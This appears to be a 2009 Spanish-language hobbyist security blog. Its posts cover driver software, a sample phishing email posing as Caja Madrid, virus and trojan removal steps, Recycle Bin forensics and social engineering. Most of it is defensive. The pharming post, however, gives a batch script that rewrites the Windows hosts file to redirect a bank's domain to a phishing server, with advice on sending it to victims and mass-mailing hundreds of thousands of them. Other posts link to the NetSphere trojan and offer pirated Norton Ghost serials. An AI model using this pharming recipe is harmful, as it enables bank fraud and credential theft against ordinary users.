Hola hoy ostraigo un programa muy muy bueno , el problema de los driver es siempre que no sabemos donde buscarlos.Driver Scanner es la solucion perfecta para actualizar automáticamente los drivers de tu PC, ya no tendrás que complicarte buscando por los vericuetos de tu computadora informacion sobre que drivers estás utilizando para luego tener que buscar en internet si hay alguna actualizacion disponible.

Driver Scanner realiza todas estas tareas en tu lugar, revisando la amplia base de datos que posee sobre los drivers actuales de muchos productos. Unos simples clicks y listo, nuestro ordenador estará "al día".

Pero no solo eso, si por alguna razón debemos reinstalar nuestro sistema operativo (Windows), Driver Scanner realizara una copia de los drivers que estabas utilizando, para que, una vez re-instalado el sistema, puedas acceder directamente a tus antiguos drivers desde un solo lugar.

Descarga:

Password
http://archivosoft.blogspot.com

fuente:
http://archivosoft.blogspot.com

Envio de correo falso

2009-10-11T11:48:00.000+02:00

hola recibi este correo lo pongo para que veais lo que es phising.

A causa de la modernizacion tecnica le aconsejamos a reactivar su cuenta‏
De: cajamadrid (Sericios@cajamadrid.es)

Apreciado Cliente,

- Nuestro nuevo sistema de seguridad le ayudara a evitar frecuentes transacciones de fraude y a guardar sus aportaciones.
- A causa de la modernizacion tecnica le aconsejamos a reactivar su cuenta.
Haga click en la referencia de abajo para entrar y empezar a usar su cuenta renovada.

_ Para entrar en su cuenta, por favor :

http://id.cajamadrid.es/auth_user/bin/auth_user.cgi?origine=wg

En caso Ud.
tenga preguntas acerca de su relacion financiera online, por favor, mandenos un Bank Mail o llamenos.
Apreciamos mucho su negocio. Atenderle es un verdadero placer para nosotros.

CajaMadrid

Caja de Ahorros y Monte de Piedad de Madrid, CAJA MADRID, C.I.F. G-28029007, Plaza de Celenque, 2. 28013 Madrid. Inscrita en el Rº Mercantil de Madrid al folio 20, tomo 3067 General, hoja 52454, y en el Rº Especial de Cajas de Ahorros con el número 99. Código B.E.: 2038. Código BIC: CAHMESMMXXX. Entidad de crédito sujeta a supervisión del Banco de España.
(c) Caja Madrid. 2001 - 2009. España. Todos los derechos reservados.

Una vez que entras en el link que ellos te ponen, entras en su scam para que pongas tus datos bancarios y lo copien en un txt. de esta forma te roban los datos bancarios.

En este caso si entrais en el link directamente os dara como falsificacion eso se debe que el scam esta alojado en algun host gratuito que no dejan poner scam , estos son un poco chapuzeros para poner scam hay que poner un host de pago.

Guía rápida para eliminar virus

2009-10-09T23:39:00.000+02:00

Tipos de virus:

1. Partición. Afectan al sector 0 del disco duro, por tanto, para solucionarlo se debe entrar en modo MS-DOS y utilizar un parche para restaurar la partición. que puede tener nombres parecidos a este: RESTRMBR.EXE. Normalmente la solución es formateo de bajo nivel.
2. Boot. Afectan al primer sector relativo de cada partición. La unica solución es formatear, no encontré parches.
3. File. Por lo general, hay que formatear, y dende del daño al sistema. El daño se manifiesta cuando todos los archivos ejecutables (.com .sys .exe .dll) están modificados por el virus para ejecutar sus secuencias. Si el antivirus, no puede reparar los archivos en cuestión, la solución es formatear.
4. Troyanos. Los troyanos son virus o programas instalados al iniciar el sistema. En la actualidad la mayor parte de los virus actúna como troyanos. Y su posible desinfección viene a continuación

Eliminación manual de virus troyanos.

1. Memoria. Eliminar el virus de la memoria RAM:
1.1 Control Alt Del (Administrador de Tareas de Windows), Finalizar tarea en la tarea sospechosa de que sea virus. Esto solo se consigue con práctica, el hecho de identificar cual Tarea es válida y cual sospechosa. Ayuda mucho en esta tarea el Señor Google. También puedes enviar el archivo a http://www.kaspersky.com/sp/virusscanner para saber si es o no virus.
1.2 MsConfig. Luego de haber Finalizado las Tareas sospechosas, es hora de arrancarlas del Inicio del sistema. Inicio, Ejecutar, MsConfig, Ficha Inicio, y aquí deshabilitamos las Tareas sospechosas. Otra vez, solo depende de la experiencia personal.En algunos casos, los virus se instalan como servicios. Para ello dentro de msconfig, entrar a servicios, que no muestre servicios comunes de Windows, y analizar cada servicio de donde proviene.
2. Disco duro. Si estamos seguros que lo que hemos deshabilitado es virus troyano, entonces se procede a su eliminación del disco duro. Un troyano actúa como un arhivo, que carga otros, en una especie de árbol. Pero cuando se lo elimina del inicio, deja de hacer daños. Yo recomiendo usar Total Commander ( www.ghisler.com ) con las opciones de ver archivos ocultos y de sistema.
2.1 Encontrar el archivo. Se pone buscar en búsqueda avanzada, pero Buscar Arhivos y carpetas ocultos, y también de sistema. Anotar exactamente el nombre Y la extensión!
2.2 Eliminarlo. O moverlo, por si acaso se quiera restituirlo o examinarlo con un antivirus más potente.
2.3 Crear Carpeta con ese nombe y extensión. Esto evita que el virus vuelva a implantarse. Cuando el virus quiera volver a instalarse, le dará un error interno, que no sabrá cómo interpretar, y abortará su instalación. Se supone que si ya existe esa carpeta, no puede haber un archivo con el mismo nombre que una carpeta ya existente.
3. Registro. Los daños causados por un virus, pueden extenderse a la configuración del Registro de Windows. En esto no hay ayuda. Si el registro fue dañado, y dependiendo de la magnitud del cambio en la configuración, lo mejor es formatear.

Notas:

* Eliminar virus, no es eliminar los daños provocados por éste. Para parchar los daños, utilizar SpyBot Search&Destroy.
* Mejores antivirus: Kaspersky, McAfee Enterprise, Zone Alarm (solo por ser firewall al mismo tiempo) y Norton (Solo las últimas versiones).

fuente: http://foros.abcdatos.com/viewtopic.php?f=28&t=15887

Análisis forense a la papelera de reciclaje.

2009-10-09T16:14:00.000+02:00

Una técnica de análisis en sistemas muertos que se utiliza para saber que elementos contiene la papelera de reciclaje, cuando han sido eliminados y quien los elimino. En primer lugar necesitamos saber donde almacena Windows la papelera de reciclaje:

* Windows NT/2000/XP/ en “C:\Recycler\”

Un ejemplo en de la estructura en un Windows XP con dos usuarios:

C:\RECYCLER\S-1-5-21-1417001333-343818398-1801674531-1004
C:\RECYCLER\ S-1-5-21-1417001333-343818398-1801674531-500

Dentro de estas carpetas de los dos usurarios de este sistema se encuentran los archivos borrados de cada uno. Además de estos archivos se encuentra también un archivo llamado INFO2 donde se almacena la información sobre cuando se borro y de donde se borro el archivo. Se puede extraer esta información con un editor hexadecimal, aunque es más fácil utilizar la herramienta rifiuti.

Ejemplo:

Entramos en la carpeta de usuario en la ruta “C:\RECYCLER”.

C:\RECYCLER\S-1-5-21-1417001333-343818398-1801674531-500>

Y ejecutamos rifiuti:

rifiuti INFO2>e:\analisis.txt

Y el resultado se genera en el archivo “analisis.txt” donde aparecerá: la fecha y hora de eliminación, la ruta de donde se eliminaron y el tamaño, de todos los archivos que se enviaron a la papelera de reciclaje.

Rifiuti también esta disponible para Linux.

descarga de
rifiuti

fuente:foro.latinohack.com

Ingenieria Social - Que es? Casos reales

2009-10-08T10:47:00.000+02:00

En el campo de la inseguridad informática, ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos. Es una técnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o delincuentes computacionales, para obtener información, acceso o privilegios en sistemas de información que les permitan realizar algún acto que perjudique o exponga la persona u organismo comprometido a riesgo o abusos.

fuente: wikipedia.

"Usted puede tener la mejor tecnología, firewalls, sistemas de detección de ataques, dispositivos biométricos, etc. Lo único que se necesita es un llamado a un empleado desprevenido e ingresan sin más. Tienen todo en sus manos." Kevin Mitnick.

"La gente quiere ser agradable y no pretende armar un escándalo, pero es importante enseñarles a decir no. No debe haber sutilezas cuando lo que está en juego son nuestros ingresos." Allan Vance

Bajo el nombre de Ingeniería Social (literalmente traducido del inglés Social Engineering) se encuentran comprendidas todas aquellas conductas útiles para conseguir información de las personas cercanas a una computadora. Es una disciplina que consiste, ni más ni menos en sacar información a otra persona sin que esta sé de cuenta de que te esta revelando "información sensible".

Hoy en día sólo son necesarias las malas intenciones y una conexión a Internet para sembrar el caos. Ya no es cuestión de conocimientos, sobre todo teniendo en cuenta que en los sistemas operativos más populares, se antepone la comodidad a la seguridad del sistema mismo. La mayoría de los ataques a la seguridad se deben a errores humanos y no a fallas electrónicas. Los intrusos usan "ingeniería social" para acceder a los sitios, y siempre alguien los deja entrar sin ningún problema.

Quote relacionada [!]

"Roba al cielo y pon alli un sol falso" Retorno a los orígenes (Daoren) Proverbio Chino

Tradicionalmente, los intrusos se han valido de los engaños para conseguir atacar al eslabón más débil de la cadena de usuarios y responsables de un equipo de cómputo o de una red. De nada vale encriptar las comunicaciones, sellar los accesos, diseñar un buen esquema de seguridad para las distintas estaciones de trabajo y jerarquizar convenientemente los accesos a los mismos si no contamos con un personal que se halle lo suficientemente preparado para hacerle frente los engaños externos.

La principal herramienta que manejan actualmente los creadores de virus es la que se ha dado en llamar ingeniería social. Con este curioso término se engloba una serie de tretas, artimañas y engaños elaborados cuyo fin es confundir al usuario o, peor todavía, lograr que comprometa seriamente la seguridad de sus sistemas. Esto no es un conocimiento exacto pero, al ponerse en práctica con un grupo tan elevado de posibles víctimas, el éxito casi siempre está garantizado. Aprovechando sentimientos tan variados como la curiosidad, la avaricia, el sexo, la compasión o el miedo, el vándalo interesado consigue su objetivo, una acción por parte del usuario.

Tradicionalmente, los intrusos se han valido de los engaños para conseguir atacar al eslabón más débil de la cadena de usuarios y responsables de un equipo de cómputo o de una red. De nada vale encriptar las comunicaciones, sellar los accesos, diseñar un buen esquema de seguridad para las distintas estaciones de trabajo y jerarquizar convenientemente los accesos a los mismos si no contamos con un personal que se halle lo suficientemente preparado para hacerle frente los engaños externos.

La principal herramienta que manejan actualmente los creadores de virus es la que se ha dado en llamar ingeniería social. Con este curioso término se engloba una serie de tretas, artimañas y engaños elaborados cuyo fin es confundir al usuario o, peor todavía, lograr que comprometa seriamente la seguridad de sus sistemas. Esto no es un conocimiento exacto pero, al ponerse en práctica con un grupo tan elevado de posibles víctimas, el éxito casi siempre está garantizado. Aprovechando sentimientos tan variados como la curiosidad, la avaricia, el sexo, la compasión o el miedo, el vándalo interesado consigue su objetivo, una acción por parte del usuario.

Quote relacionada [!] "In fact, female social engineers have a distinct advafntage because they can use their sexuality to obtain cooperation". Kevin Mitnick, The Art Of Deception. [Chapter 4]

Un claro ejemplo de Ingeniería Social más común es el de alguien que llama por teléfono a una empresa para decir que necesita ayuda o hablar con el administrador de la red porque hay que modificar algún aspecto de la configuración. Durante la conversación, y a través de escogidas y cuidadas preguntas, el atacante obtendrá los datos (como los códigos de acceso a los equipos) que necesita para vulnerar la seguridad de todo el corporativo.

La ingeniería social es una acción muy simple, pero peligrosa. Los "hackers" llaman a los centros de datos y fingen ser un cliente que perdió su contraseña, o se dirigen a un sitio y esperan que alguien deje la puerta abierta. Otras formas de ingeniería social no son tan obvias. Los "hackers" son conocidos por crear sitios Web, concursos o cuestionarios falsos que piden a los usuarios que ingresen una contraseña. Si un usuario escribe la misma contraseña que usa en su trabajo, el hacker puede ingresar en las instalaciones sin tener que descifrar ni siquiera una línea de código.
Quote relacionada [!]

"Many people look arround until they find a better deal; social engineers don´t look for a better deal, they find a way to make a deal better." Kevin Mitnick, The Art Of Deception. [Chapter 4]

Con el objetivo de infectar el mayor número posible de equipos, cada vez son más los gusanos que recurren a la Ingeniería Social, habitualmente empleada por los creadores de código malicioso para engañar a los usuarios. En la Ingeniería Social no se emplea ningún programa de software o elemento de hardware, sólo grandes dosis de ingenio, sutileza y persuasión para así lograr obtener información a través de otra persona sin que se dé cuenta de que está revelando información importante con la que, además, el atacante puede dañar su computadora.

En la práctica, los autores de virus (gusanos o troyanos) emplean la Ingeniería Social para que sus creaciones se propaguen rápidamente. Para ello atraen la atención del usuario y consiguen que realice alguna acción que, normalmente, consiste en inducirlo a que abra algún archivo que es el que procede a realizar la infección. De hecho, la mayoría de las pérdidas provocadas por los efectos de los códigos maliciosos tienen su origen en la ignorancia u omisión de políticas de seguridad.
Quote relacionada [!]

"Many people look arround until they find a better deal; social engineers don´t look for a better deal, they find a way to make a deal better." Kevin Mitnick, The Art Of Deception. [Chapter 4]

El personal de una empresa debería de seguir las siguientes recomendaciones para evitar caer víctima de las trampas de la Ingeniería Social:

1. - Antes de abrir los correos analizarlos con un antivirus eficaz y debidamente actualizado, ya que cualquier mensaje de correo electrónico puede contener códigos maliciosos aunque no le acompañe el símbolo de datos adjuntos.

2. - Nunca ejecutar un programa de procedencia desconocida, aun cuando previamente sea verificado que no contiene virus. Dicho programa puede contener un troyano o un sniffer que reenvíe nuestra clave de acceso.

3. - Los usuarios no necesitan tener acceso a todo tipo de ficheros ya que no todos son necesarios para su trabajo habitual, por ello puede ser conveniente por parte del administrador bloquear la entrada de ficheros con extensiones ".exe",".vbs", etc.

4. - Nunca informe telefónicamente de las características técnicas de la red, sus localizaciones espaciales o personas a cargo de la misma. En su lugar lo propio es remitirlos directamente al responsable del sistema.

5.- Controlar los accesos físicos al lugar donde se hallan los servidores o terminales desde los que se puede conectar con los servicios centralizados de control.

6.- Nunca tirar documentación técnica a la basura, sino destruirla.

7.- Verificar previamente la veracidad de la fuente que solicite cualquier información sobre la red, su localización en tiempo y espacio y las personas que se encuentran al frente de la misma.

8.- En caso de existir, instalar los parches de actualización de software que publican las compañías para solucionar vulnerabilidades. De esta manera se puede hacer frente a los efectos que puede provocar la ejecución de archivos con códigos maliciosos.

10.- Controlar que las anteriores instrucciones se cumplen sistemáticamente.
fuente: http://www.lcu.com.ar/ingenieriasocial/

Como ser Hacker y como evitarlos

2009-10-04T18:20:00.000+02:00

Quien es Kevin Mitnick?

Kevin Mitnick (nacido el 6 de agosto de 1963) es uno de los hackers y Phreakers más famosos de los Estados Unidos. Su último arresto se produjo el 15 de febrero de 1995, tras ser acusado de entrar en algunos de los ordenadores más "seguros" de EE.UU.
Ya había sido procesado judicialmente en 1981, 1983 y 1987 por diversos delitos electrónicos.El caso de Kevin Mitnick (su último encarcelamiento) alcanzó una gran popularidad entre los medios estadounidenses por la lentitud del proceso (hasta la celebración del juicio pasaron más de dos años), y las estrictas condiciones de encarcelamiento a las que estaba sometido (se le aisló del resto de los presos y se le prohibió realizar llamadas telefónicas durante un tiempo por su supuesta peligrosidad).
Tras su puesta en libertad en 2002, Kevin Mitnick se dedica a la consultoría y el asesoramiento en materia de seguridad, a través de su compañía "Mitnick Security"(Anteriormente llamada: Defensive Thinking).

descarga:

Norton Ghost 14.0

2009-09-28T16:49:00.000+02:00

Hola hoy ostraigo este sofware para copias de seguridad

Norton Ghost es prácticamente la última innovación cuando se trata de hacer copia de respaldo de tus datos. Esta herramienta puede hacer respaldo de todo tipo de material en tu disco, incluyendo tu sistema operativo. Aún si tienes un fallo total en tu disco, puede restaurar tu sistema completo en un nuevo disco duro. Norton Ghost soporta copias incrementales de manera que no tengas la necesidad de hacer una copia de respaldo completa de tu sistema cada vez que lo necesites.

Norton Ghost realiza copias de respaldo a discos externos conectados a tu puerto USB o Puerto de Firewire(IEEE 1394, o quema tus copias de respaldo a CDs o DVDs. Además te permite realizar copias a redes compartidas sobre cualquier servidor de archivos o Redes de Almacenamiento (NAS), e incluso servidores FTP.

Para descagar desde cualquier pagina web y para los seriales mandarme un mensaje al correo y os digo los seriales.

20 cosas que Probablemente no sabias sobre tu PC

2009-09-25T17:31:00.000+02:00

1. Es malo tener imágenes pegadas en el monitor.

Verdadero. Sí, desgasta los colores. Si quierés acerca frente al monitor un desarmador que tenga imán en la punta y vas a ver como los imánes que tiene dentro hacen distorsión en los colores de la pantalla.

2. Empujar el Cd para meterlo adentro de la compactera es malo.

Falso. Abslutamente nada, está hecho para eso también.

3. Si se te cae agua arriba del teclado, puede dañarse.

Verdadero. Se queman las pistas de metal que están abajo de las letras.

4. Es importante que haya espacio entre el monitor y la pared.

Falso. No es necesario. Sólo necesita buena ventilación.

5. Hay que reiniciar o apagar y prender la computadora cuando estuvo toda la noche prendida.

Falso. Puede seguir funcionando perfectamente el disco rígido se conserva más si queda prendida y no es apagada una y otra vez. Fueron creadas para eso.

6. Consume más energía cuando se prende, que en varias horas de uso.

Falso. Al encender consume sólo un poco más que estando en funcionamiento.

7.Le hace daño al CPU tener un celular cerca.

Falso. No le hace daño, sólo provoca interferencia.

8. Cuando apagas la computadora, dejala descansar unos segundos antes de prenderla denuevo.

Verdadero. Se recomiendan 10 segundos.

9. Si se mueve el CPU con la PC prendida puede quemarse del disco rígido.

Falso. Es tanta la fuerza centrífuga con la que gira el disco rígido que no pasa nada si se mueve el CPU. Obvio que no hablamos de golpearla.

10. Es bueno para el monitor dejar un protector de pantalla cuando el mismo no se encuentra en uso.

Verdadero. El protector de pantalla hace que el desgaste de los colores sea uniforme.

11. Cuando hay tormenta mejor desenchufa la PC

Verdadero. Es casi una obligación cuando hay una tormenta eléctrica. Una cantidad impresionante de modems se rompen por descarga de rayos.

12. No es bueno mirar la luz roja de los mouses opticos.

Verdadero. No va a dejar ciego a nadie, pero es una luz fuerte que causa daño.

13. En las notebooks hay que enchufar primero el cable de corriente a la computadora y después ese cable a tierra.

Falso. Puede hacerse como se quiera.

14. Cuando se apaga la PC es conveniente apagar también el monitor.

Falso. Al apagar el CPU queda en un estado en el que consume muy poca energía y no se desgasta.

15. No poner CDs o Diskettes sobre el CPU, es malo.

Falso. Nada de lo que se ponga sobre ella la afecta, a menos que esté mojado y el agua pueda entrar al CPU.

16. Nunca poner la PC al sol.

Verdadero. Se recalienta más de lo que lo normal, disminuyendo su vida útil.

17. El disco rígido con el 80% de su capacidad usada, hace más lenta la PC.

Verdadero. El funcionamiento de la computadora será lento.

18. No quitar el USB sin avisarle a la maquina.

Verdadero. Hay que seleccionar la opción para “retirarlo con seguridad” antes de desenchufarlo por que se corre el riesgo de quemar la memoria del USB.

19. El escritorio lleno de iconos, hace más lenta la máquina.

Verdadero. Los que importan son los íconos de programas o archivos, por que la tarjeta de video de la computadora renueva constantemente la información que se presenta en la pantalla y cuando hay más íconos, tarda más.

20. Apagar la máquina mediante el famoso botonazo puede dañar tu computadora.

Verdadero. Si se le saca corriente al disco rigido mientras está leyendo o escribiendo en alguna parte del sistema, se puede quemar. Cuando se apaga repentinamente, las placas que cubren al disco (que gira hasta 10 mil revoluciones) aterrizan sobre él y pueden ir “picando” hasta la posición de descanso, dejándole marcas importantes.

fuente: http://www.edumanmx.com/2008/10/20-cosas-que-probablemente-no-sabias.html

¿Que es pharming ?

2009-09-24T12:27:00.000+02:00

hola ostraigo esto para que sepais que es el pharming.

Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio.

fuente wikipededia

Ahora que sabemos esto como funciona:

ejemplo haremos un bat que modifique el hosts,se copia en el bloc de notas

@echo off
echo 00.000.000.00 http//banco.com >>%windir%\System32\drivers\etc\hosts
echo 00.000.000.00 www.banco.com >>%windir%\System32\drivers\etc\hosts
echo 00.000.000.00 banco.com >>%windir%\System32\drivers\etc\hosts

1.- Donde 00.000.000.00 es donde esta el scam del banco que se quiere entrar

2.- windir%\System32\drivers\etc\hosts (ACA ESTA LA RUTA DEL ARCHIVO QUE VA HACER MODIFICADO PARA HACER LAS REDIRECCIONAMIENTOS)

AHORA LA PREGUNTA DEL MILLON DE DOLARES Y COMO SE LO ENVIO AMI VICTIMA O VICTIMAS

3.- Una vez creado se compila y se manda a la victima ,la victima lo abre y cuando el cree que esta en su banco realmente esta redireccionando al host en el cual hay un scam ,lo abrira como si entrase en la web y lo que hara es darle todos los datos
bancarios a la persona que le manda el codigo malicioso.

PD: PARA HACER ENVIO MASIVOS SOLO SE NECESITAS TENER EMAIL DE VICTIMAS DE UN DETERMINADO PAIS Y ENVIARLOS A TRAVES DE UN MAILER SUBIDO EN UN HOST DE PAGA PARA ENVIAR UNOS 100.000 A 200,000 ENVIOS AL DIA

Espro que les halla servido y recordar no descargar nada que desconfieis, o pasarlo antes por novirusthanks.

Protégete de keyloggers en Windows con Neo’s SafeKeys

2009-09-23T19:23:00.000+02:00

Habitualmente estamos expuestos a cientos de amenazas informáticas, y si manejamos contraseñas, claves, somos vulnerables a cualquier keylogger , que no es más que un programa que registra en un archivo de texto las teclas pulsadas en nuestro sistema.

Por supuesto que existen muchos métodos para protegernos de estos programas que son tan peligrosos. Una de las maneras es usando un teclado virtual, y es eso lo que es Neo’s SafeKeys, un teclado virtual para Windows con el cual aumentarás tu privacidad.

El funcionamiento de Neo’s SafeKeys es sencillo. Una vez que lo hayamos ejecutado (por cierto, es portátil, no requiere de instalación), anotamos la contraseña que como se ve, está también protegida con asteriscos. Luego podremos arrastrar dicha contraseña al formulario o campo de texto en el que queremos ingresar dicho dato privado.

descargar: http://www.aplin.com.au/?page_id=246

PassPub, Generador de Contraseñas Seguras

2009-09-23T19:16:00.000+02:00

hola hoy os traigo un sofware bastante bueno como su nombre dice genera contraseñas seguras.
Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos Myvidoop)

PassPub nos permite generar contraseñas de 64, 128 o 256bits para redes inalambricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.

descargar en https://passpub.com/

fuente: dragonjar

¿como librarse de un troyano?(tercera parte)

2009-09-22T12:14:00.000+02:00

Lo cual significa que tenemos procesos en nuestro ordenador que están esperando conección en los puertos: 6711, 6776, 30100, 30101, 30102, 1234, y 1035.
f) Comenzamos a matar, uno por uno, los procesos que no sabemos que función cumplen. Si matamos alguno que no debíamos, y el ordenador se bloquea, ya sabemos para la próxima vez que ese proceso no es un troyano, y que no hay que matarlo
Ejemplo: decido matar al proceso llamado:
C:\WINDOWS\SYSTEM\NSSX.EXE
que es muy sospechoso...
Acto seguido, volvemos a la ventana de DOS y pedimos otro listado de "Netstat -a", que nos devuelve lo siguiente:
Proto Dirección local Dirección remota Estado
TCP Donatien:6711 0.0.0.0:0 LISTENING
TCP Donatien:6776 0.0.0.0:0 LISTENING
TCP Donatien:1243 0.0.0.0:0 LISTENING
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Por suspuesto!!! Se han cerrado tres puertos!! (30100, 30101 y 30102, que ya no aparecen en el listado) Al estar seguros que NSSX.EXE no pertenece a ningún programa que nosotros hayamos instalado, y de que el sistema continúa ejecutándose sin ningún problema (o sea que no era parte del Windows), podemos cambiarle el nombre al archivo para que no se vuelva a ejecutar la próxima vez que reiniciemos. Para eso usamos el comando "RENAME C:\WINDOWS\SYSTEM\NSSX.EXE C:\WINDOWS\SYSTEM\NSSX.EX_".
Nótese que tán solo le cambiamos la extensión, para, en caso de habernos equivocado, recuperar el archivo fácilmente.
Podemos renombrar al archivo debido a que ya lo matamos. Si el proceso estuviera ejecutándose no podríamos modificar ni borrar el NSSX.EXE
Otro modo de cambiarle el nombre es ir con el Explorador hasta el directorio C:\WINDOWS\SYSTEM, buscar el archivo NSSX.EXE y situados sobre él presionar F2, escribir el nuevo nombre y .
Ahora, aunque no es del todo indispensable, y no es recomendable para los novatos absolutos, podríamos abrir el registro de windows con el REGEDIT y eliminar la entrada que antes ejecutaba el troyano cada vez que encendíamos la máquina. La entrada está dentro de la rama: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run y es la siguiente: "NSSX" y su valor es "C:\WINDOWS\system\nssx.exe"
Para borrarla basta con marcarla con el mouse, pulsar DEL, y confirmar.
Es importante no andar borrando cualquier cosa del registro. Para aprender más sobre qué es el registro y qué programas ejecuta Windows al arrancar, lean la emisión Nro. 16 de esta misma revista en http://dzone.findhere.com . Allí también aprenderán que la rama del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" no es el unico lugar en el cual un troyano puede asegurarse el ser ejecutado en cada sesión.
El caso de este ejemplo se trataba del famoso NetSphere, un troyano bastante nuevo, que se puede descargar de http://angelfire.com/ar/NetSphere/index2.html . Pueden usarlo para practicar, pero por favor, no sean "Lamers", no lo usen con otras personas, porque dejarían sus máquinas a merced de cualquiera, y si lo usan con ustedes mismos, tengan en cuenta de que no deben conectarse a Internet mientras tengan el troyano instalado. (justamente, para evitar eso es que explico todo esto).
Sigamos con otro ejemplo, sabemos que la lista del "Netstat -a" es ahora más corta:

Proto Dirección local Dirección remota Estado
TCP Donatien:6711 0.0.0.0:0 LISTENING
TCP Donatien:6776 0.0.0.0:0 LISTENING
TCP Donatien:1243 0.0.0.0:0 LISTENING
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Pues bien, ahora procedamos a cerrar el proceso: C:\WINDOWS\WINDOW.EXE
El sistema sigue perfectamente estable, y volvemos a pedir el "Netstat -a" y...
Proto Dirección local Dirección remota Estado
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Ohhhhh!! Se han cerrado otros tres puertos! (aclaro que un troyano no necesariamente utiliza 3 puertos, puede utilizar más, o menos).
Próximo paso: renombramos el archivo para que no vuelva a ejecutarse nunca más, vamos a la ventana de DOS, y escribimos: "RENAME C:\WINDOWS\WINDOW.EXE C:\WINDOWS\WINDOW.EX_"
Como ya dije, también podemos eliminar la entrada del registro que lo ejecuta, pero como, habiendo renombrado el archivo, ya no es necesario, lo dejo librado al lector.
Como en mi caso, por experiencia, sé que el puerto 1035 no se trata de un troyano, no voy a continuar matando procesos, pero si tuviera más puertos abiertos, (en el ejemplo que dí al principio había cuatro troyanos y no dos) continuaría haciendolo hasta encontrarlos todos.
Quiero aclarar que no es muy comun que un ordenador esté lleno de troyanos como en estos ejemplos, pero si notan que alguien está molestándolos de un modo extraño cuando entran a Internet, intenten con esta "limpieza".
Otra aclaración: Si matan procesos que no son troyanos NO HAY PROBLEMA, lo peor que puede ocurrir es que tengan que reiniciar la máquina. Sólo asegurense de no tener archivos sin grabar (como un documento de Word) para no perderlo, al momento de estar haciendo estas comprobaciones.
También cabe aclarar que, aunque yo no conozco ninguno, pueden existir troyanos más "inteligentes", que no tengan puertos abiertos cuando no estamos conectados, a esos hay que detectarlos por un método diferente, o bien, intentar hacerlo mientras estamos conectados a Internet (aunque en ese caso la cosa se complicaría debido a los demás programas que utilizan Internet -como el ICQ- y abren a su vez sus propios puertos, con lo cual la lista se hace más difícil de interpretar).

Como librarse de un troyano?(segunda parte)

2009-09-21T16:43:00.000+02:00

Si tenemos en cuenta que es muy dificil que un troyano se instale en otro lado que no sea los directorios WINDOWS o SYSTEM, ya descartamos tres posibilidades (las tres últimas, pero es más seguro descartarlas cuando conocemos la función de cada una de ellas), veamos:
C:\ARCHIVOS DE PROGRAMA\ICQ\ICQ.EXE
es ni más ni menos que el ICQ, si lo matamos, se nos cierra el ICQ.
C:\ARCHIVOS DE PROGRAMA\OUTLOOK EXPRESS\MSIMN.EXE
se trata, como se podrán imaginar, del Outlook Express.
C:\ARCHIVOS DE PROGRAMA\MATAPROCESOS\MATAPROCESOS.EXE
este es tanto o más obvio que los anteriores, nosotros mismos acabamos de ejecutarlo.
También hay que conocer otros procesos comunes de Windows, ¿y cómo lo hacemos? si se trata de algunos de los que ya nombré, yo mismo voy a presentarselos, pero si son otros que no se mustran aquí, probablemente con el método de "prueba y error".
Veamos:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
Este es el "corazón" del Windows, si lo cerramos, tendremos que reiniciar.
C:\WINDOWS\SYSTEM\MSGSVR32.EXE
Este es una utilidad interna, si la cerramos el sistema probablemente pierda estabilidad.
C:\WINDOWS\SYSTEM\mmtask.tsk
Cerrar este es imposible. Siempre vuelve a aparecer. Tiene que ver con las tareas multimedia que el Windows realiza.
C:\WINDOWS\EXPLORER.EXE
Se trata del explorador. Gestiona tanto al Internet Explorer como al Windows Explorer. También gestiona la barra de tareas. Si lo cerramos se nos cierran estas tres cosas. (Generalmente se vuelve a ejecutar automáticamente)
C:\WINDOWS\TASKMON.EXE
Es el monitor de tareas de Windows. Si lo cerramos aparentemente no ocurre nada, pero no recomiendo cerrar procesos sin saber exactamente qué función cumplen, a menos que no nos moleste vernos obligados a reiniciar...
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
Es el "parlantito" (la bocinita) que aparece en la barra de tareas, el programa que nos dá el control del volumen de sonidos de Windows. Si lo cerramos, el parlante (la bocina) desaparece.
C:\WINDOWS\RNAAPP.EXE C:\WINDOWS\TAPISVR.EXE
Estos dos son los que se ejecutaron cuando nos conectamos a Internet. Si los cerramos la conexión se corta y no podremos volver a conectarnos hasta reiniciar la computadora.

Pues bien, ¿qué nos queda?
C:\WINDOWS\PATCH.EXE C:\WINDOWS\WINDOW.EXE C:\WINDOWS\SYSTEM\ .EXE C:\WINDOWS\SYSTEM\NSSX.EXE
¡Ja! se trata ni más ni menos que de ¡cuatro troyanos! Toda una exageración... Nuestra seguridad (la de nuestros archivos) se ve totalmente violada por culpa de cada uno de estos procesos... ¿Cómo podemos estar seguros de que se trata de troyanos? Eso lo explico en el apartado que viene, pero en el caso de estos cuatro, basta con decir que ya son tán famosos que no hace falta hacer las comprobaciones...
C:\WINDOWS\PATCH.EXE
es el maldito patch del NETBUS
C:\WINDOWS\SYSTEM\ .EXE
es el servidor del Back Orifice
C:\WINDOWS\SYSTEM\NSSX.EXE
es el servidor del NetSphere
C:\WINDOWS\WINDOW.EXE
es un troyano, aunque no sé exactamente cuál... (probablemente SubSeven o una versión levemente modificada del NetBus)
Matando a LOS CUATRO podemos continuar navegando tranquilos, ya que el agresor perdió totalmente su poder. PERO CUIDADO, nuestro sistema seguramente fué modificado para que estos programas se ejecuten cada vez que arrancamos, y como el MataProceso no los borra del disco, sino simplemente los erradica de la memoria, no estamos a salvo de que la próxima vez que reiniciemos ¡los troyanos estén nuevamente allí!
